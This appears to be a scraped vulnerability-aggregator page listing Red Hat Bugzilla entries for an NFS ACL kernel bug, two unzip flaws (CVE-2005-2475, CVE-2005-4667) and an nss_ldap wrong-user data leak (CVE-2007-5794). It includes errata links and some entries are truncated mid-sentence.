the wrong hunk of memory and potentially lead to a panic. It's not clear that
this code path has been tested much, and the problem has been in Linux kernels
since June 2005:
http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=a257cdd0e2179630d3201c32ba14d7fcb3c3a055
It was discovered at Connectathon 2007, largely thanks to much detective work by
Greg Banks at SGI.
Some workarounds are to either disable NFSv2 entirely, or disable ACLs entirely
(CONFIG_NFSD_V2_ACL=n -and- CONFIG_NFSD_V3
Bugzilla
CVE-2005-2475 TOCTOU issue in unzip
bugzilla·2007-02-01·CVSS 1.2
CVE-2005-2475 [LOW] CVE-2005-2475 TOCTOU issue in unzip
CVE-2005-2475 TOCTOU issue in unzip
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHBA-2007-0418.html
Bugzilla
CVE-2005-4667 unzip long filename buffer overflow
bugzilla·2006-03-24·CVSS 3.7
CVE-2005-4667 [LOW] CVE-2005-4667 unzip long filename buffer overflow
CVE-2005-4667 unzip long filename buffer overflow
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHBA-2007-0418.html
Discussion:
Call which can be closed. Errata RHBA-2007:0418-2 delivers
unzip-5.50-35.EL3.i386.rpm
Internal Status set to 'Resolved'
Status set to: Closed by Client
This event sent from IssueTracker by yves.begrand
issue 88545
Bugzilla
CVE-2007-5794 nss_ldap randomly replying with wrong user's data [rhel-4.7]
bugzilla·2005-04-17·CVSS 4.3
CVE-2007-5794 [MEDIUM] CVE-2007-5794 nss_ldap randomly replying with wrong user's data [rhel-4.7]
CVE-2007-5794 nss_ldap randomly replying with wrong user's data [rhel-4.7]
+++ This bug was initially created as a clone of Bug #154314 +++
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6)
Gecko/20050225 Firefox/1.0.1
Description of problem:
Second time already when I hear nss_ldap is replying with wrong results and
causing peoples' mails to be shown to wrong people:
http://www.dovecot.org/list/dovecot/2005-March/006345.html
http://www.dovecot.org/list/dovecot/2005-April/006859.html
Something should really be done about this. At the very least I'm adding a check
to make sure getpwnam() returns the same user name that is being requested, and
if not put out some huge warnings about something being broken..
Version-Release number of sele
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034618.htmlhttp://secunia.com/advisories/15752http://svn.edgewall.com/repos/trac/tags/trac-0.8.4/ChangeLoghttp://www.hardened-php.net/advisory-012005.phphttp://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034618.htmlhttp://secunia.com/advisories/15752http://svn.edgewall.com/repos/trac/tags/trac-0.8.4/ChangeLoghttp://www.hardened-php.net/advisory-012005.php
2005-06-19
Published